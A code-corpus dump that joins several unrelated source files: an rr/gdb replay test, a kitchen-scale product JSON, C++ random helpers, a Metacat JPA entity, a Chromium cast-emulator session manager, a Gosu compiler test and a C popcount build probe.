send_gdb('break breakpoint')
expect_gdb('Breakpoint 1')
# Continue until the breakpoint is hit.
send_gdb('c')
expect_gdb('Breakpoint 1')
# Step one instruction at the breakpoint, then run to completion.
send_gdb('stepi')
send_gdb('c')
# The replayed program should report success and gdb should see a clean exit.
expect_rr('EXIT-SUCCESS')
expect_gdb('exited normally')
ok()
| 93 |
310 | <filename>gear/hardware/a/aws-600-blk.json
{
"name": "AWS-600-BLK",
"description": "Kitchen scales.",
"url": "https://www.amazon.com/American-Weigh-Scales-AWS-600-BLK-Nutrition/dp/B000O37TDO/"
}
| 89 |
309 | #include <random>
#include <algorithm>
// Random utility functions
//
// ---------------------------------------------------------
// Copyright (c) 2016, <NAME>
//
// This file is part of the APC Vision Toolbox and is available
// under the terms of the Simplified BSD License provided in
// LICENSE. Please retain this notice and LICENSE if you use
// this file (or any portion of it) in your project.
// ---------------------------------------------------------
// Returns a uniformly distributed float in [min, max - 0.0001).
//
// The small offset below max preserves the original contract: callers floor
// the result and rely on it never reaching max. The engine is now seeded once
// per thread instead of reconstructing std::random_device/std::mt19937 on
// every call, which is both far cheaper and statistically sounder.
float GetRandomFloat(float min, float max) {
  static thread_local std::mt19937 mt{std::random_device{}()};
  std::uniform_real_distribution<double> dist(min, max - 0.0001);
  return dist(mt);
}
// Returns a random string of `str_len` characters drawn uniformly from
// [0-9a-z].
//
// Uses a proper std::uniform_int_distribution instead of the previous
// float/floor round-trip, so every character is exactly equally likely and no
// random engine is constructed per character.
std::string GetRandomString(size_t str_len) {
  static constexpr char kCharSet[] = "0123456789abcdefghijklmnopqrstuvwxyz";
  static thread_local std::mt19937 mt{std::random_device{}()};
  // sizeof includes the terminating '\0'; the last valid index is size - 2.
  std::uniform_int_distribution<size_t> pick(0, sizeof(kCharSet) - 2);
  std::string rand_str(str_len, 0);
  std::generate_n(rand_str.begin(), str_len, [&] { return kCharSet[pick(mt)]; });
  return rand_str;
}
| 361 |
1,262 | <reponame>chinmayapadhi/metacat
/*
* Copyright 2016 Netflix, Inc.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.metacat.connector.s3.model;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.FetchType;
import javax.persistence.JoinColumn;
import javax.persistence.OneToOne;
import javax.persistence.UniqueConstraint;
/**
* Location.
*/
@Entity
@javax.persistence.Table(name = "location",
    uniqueConstraints = @UniqueConstraint(name = "location_u1", columnNames = "table_id"))
public class Location extends IdEntity {
    /*
    static belongsTo = [table: Table]
    static hasOne = [schema: Schema, info: Info]
    //TODO: Serde info
    String uri
     */
    // Physical URI of the table data; nullable at the schema level.
    private String uri;
    // Owning table; one location per table (enforced by constraint location_u1).
    private Table table;
    private Schema schema;
    private Info info;

    /** Returns the storage URI of this location, or null if unset. */
    @Column(name = "uri", nullable = true)
    public String getUri() {
        return uri;
    }

    public void setUri(final String uri) {
        this.uri = uri;
    }

    /** Returns the table this location belongs to (required, one-to-one). */
    @OneToOne
    @JoinColumn(name = "table_id", nullable = false)
    public Table getTable() {
        return table;
    }

    public void setTable(final Table table) {
        this.table = table;
    }

    /** Returns the schema owned by this location; cascades all operations. */
    @OneToOne(cascade = CascadeType.ALL, fetch = FetchType.EAGER, mappedBy = "location")
    public Schema getSchema() {
        return schema;
    }

    public void setSchema(final Schema schema) {
        this.schema = schema;
    }

    /** Returns the serde/info record owned by this location; cascades all operations. */
    @OneToOne(cascade = CascadeType.ALL, fetch = FetchType.EAGER, mappedBy = "location")
    public Info getInfo() {
        return info;
    }

    public void setInfo(final Info info) {
        this.info = info;
    }
}
| 823 |
14,668 | // Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.components.media_router.cast_emulator.remote;
import android.app.PendingIntent;
import android.content.Context;
import android.net.Uri;
import androidx.mediarouter.media.MediaSessionStatus;
/**
 * LocalSessionManager emulates the local management of the playback of media items on Chromecast.
 * It only handles one item at a time, and does not support queuing.
 *
 * Most members simply forward their calls to a RemoteSessionManager, which emulates the session
 * management on the Chromecast; this class additionally owns the connect/disconnect lifecycle of
 * that RemoteSessionManager.
 */
public class LocalSessionManager {
    /**
     * Callbacks for MediaRouteProvider object.
     */
    public interface Callback {
        void onItemChanged(MediaItem item);
    }

    private final Context mContext;
    private RemoteSessionManager mRemoteManager;
    private Callback mCallback;

    /**
     * @param context the Android context used when connecting the remote session
     */
    public LocalSessionManager(Context context) {
        mContext = context;
    }

    /**
     * @return whether there is a current session
     */
    public boolean hasSession() {
        return mRemoteManager != null;
    }

    /** Connects the remote session manager if it is not already connected, and returns it. */
    private RemoteSessionManager connectedManager() {
        if (mRemoteManager == null) {
            mRemoteManager = RemoteSessionManager.connect(this, mContext);
        }
        return mRemoteManager;
    }

    /**
     * Add a video we want to play.
     * @param uri the URI of the video
     * @param mime the mime type
     * @param receiver the pending intent to use to send state changes
     * @return the new media item
     */
    public MediaItem add(Uri uri, String mime, PendingIntent receiver, long contentPosition) {
        return connectedManager().add(uri, mime, receiver, contentPosition);
    }

    /**
     * End the current session.
     * @return whether there was a current session
     */
    public boolean endSession() {
        if (!hasSession()) return false;
        mRemoteManager.disconnect();
        mRemoteManager = null;
        return true;
    }

    /**
     * Get the currently playing item.
     * @return the currently playing item, or null if none
     */
    public MediaItem getCurrentItem() {
        if (!hasSession()) return null;
        return mRemoteManager.getCurrentItem();
    }

    /**
     * Get the session id of the current session.
     * @return the session id, or null if none
     */
    public String getSessionId() {
        if (!hasSession()) return null;
        return mRemoteManager.getSessionId();
    }

    /**
     * Get the status of a session.
     * @param sid the session id of session being asked about
     * @return the status
     */
    public MediaSessionStatus getSessionStatus(String sid) {
        if (hasSession()) return mRemoteManager.getSessionStatus(sid);
        // No connection: report the session as invalidated.
        return new MediaSessionStatus.Builder(MediaSessionStatus.SESSION_STATE_INVALIDATED)
                .setQueuePaused(false)
                .build();
    }

    /**
     * Get a printable string describing the status of the session.
     * @return the string
     */
    public String getSessionStatusString() {
        return hasSession() ? mRemoteManager.getSessionStatusString()
                            : "No remote session connection";
    }

    /**
     * Get the status of a media item.
     * @param iid the id of the item
     * @return the MediaItem, from which its status can be read
     */
    public MediaItem getStatus(String iid) {
        if (!hasSession()) throw new IllegalStateException("Session not set!");
        return mRemoteManager.getStatus(iid);
    }

    /**
     * @return whether the current video is paused
     */
    public boolean isPaused() {
        if (!hasSession()) return false;
        return mRemoteManager.isPaused();
    }

    /**
     * Forward the item changed callback to the UI.
     * @param item the item that has changed
     */
    public void onItemChanged(MediaItem item) {
        if (mCallback == null) return;
        mCallback.onItemChanged(item);
    }

    /**
     * Pause the current video.
     */
    public void pause() {
        if (!hasSession()) return;
        mRemoteManager.pause();
    }

    /**
     * Resume the current video.
     */
    public void resume() {
        if (!hasSession()) return;
        mRemoteManager.resume();
    }

    /**
     * Seek to a position in a video.
     * @param iid the id of the video
     * @param pos the position in ms
     * @return the media item, or null if there is no session
     */
    public MediaItem seek(String iid, long pos) {
        if (!hasSession()) return null;
        return mRemoteManager.seek(iid, pos);
    }

    /**
     * Provide a callback interface to tell the UI when significant state changes occur.
     * @param callback the callback object
     */
    public void setCallback(Callback callback) {
        mCallback = callback;
    }

    /**
     * Start a new local session.
     * @param relaunch relaunch the remote session (the emulation of the Chromecast app) even if it
     *         is already running.
     * @return the new session id
     */
    public String startSession(boolean relaunch) {
        if (!relaunch) endSession();
        return connectedManager().startSession(relaunch);
    }

    /**
     * Stop the current video and end the session.
     */
    public void stop() {
        if (hasSession()) mRemoteManager.stop();
        endSession();
    }

    /**
     * Updates the session status.
     */
    public void updateStatus() {
        if (!hasSession()) return;
        mRemoteManager.updateStatus();
    }
}
/*
* Copyright 2014 <NAME>, Inc.
*/
package gw.internal.gosu.compiler;
import gw.internal.gosu.ir.transform.GosuClassTransformer;
import gw.internal.gosu.ir.transform.util.IRTypeResolver;
import gw.lang.reflect.Modifier;
import gw.lang.reflect.TypeSystem;
import gw.lang.reflect.gs.IGosuEnhancement;
import java.lang.reflect.Field;
/**
*/
public class EnhancedTypeFieldTest extends ByteCodeTestBase
{
public void testThis() throws Exception
{
Class cls = newTestClass();
// The compiler adds the ENHANCED$TYPE field for tooling
Field f = cls.getDeclaredField( GosuClassTransformer.ENHANCED_TYPE_FIELD );
assertTrue( Modifier.isPrivate( f.getModifiers() ) );
IGosuEnhancement type = (IGosuEnhancement)TypeSystem.get( cls );
assertEquals( IRTypeResolver.getDescriptor( type.getEnhancedType() ).getName(), f.getType().getName() );
}
private Class newTestClass() throws ClassNotFoundException, InstantiationException, IllegalAccessException
{
final String classPropertyIdentifier = "gw.internal.gosu.compiler.sample.statement.classes.EnhancedTypeFieldTest_Enh";
Class<?> javaClass = GosuClassLoader.instance().findClass( classPropertyIdentifier );
assertNotNull( javaClass );
assertEquals( classPropertyIdentifier, javaClass.getName() );
return javaClass;
}
} | 445 |
/*
 * Build-system feature probe: compiles and links the hardware population-count
 * intrinsics (POPCNT). On MSVC the SSE4.2 intrinsics from <nmmintrin.h> are
 * used; elsewhere the GCC/Clang builtins are used. A successful compile+link
 * means the toolchain/target supports popcount.
 */
#ifdef _MSC_VER
#include <nmmintrin.h>
#else
#include <popcntintrin.h>
#endif

int main(void)
{
    long long a = 0;
    int b;
#ifdef _MSC_VER
#ifdef _M_X64
    /* The 64-bit intrinsic only exists when targeting x64. */
    a = _mm_popcnt_u64(1);
#endif
    b = _mm_popcnt_u32(1);
#else
#ifdef __x86_64__
    a = __builtin_popcountll(1);
#endif
    b = __builtin_popcount(1);
#endif
    /* Use both results so the calls cannot be optimized away entirely. */
    return (int)a + b;
}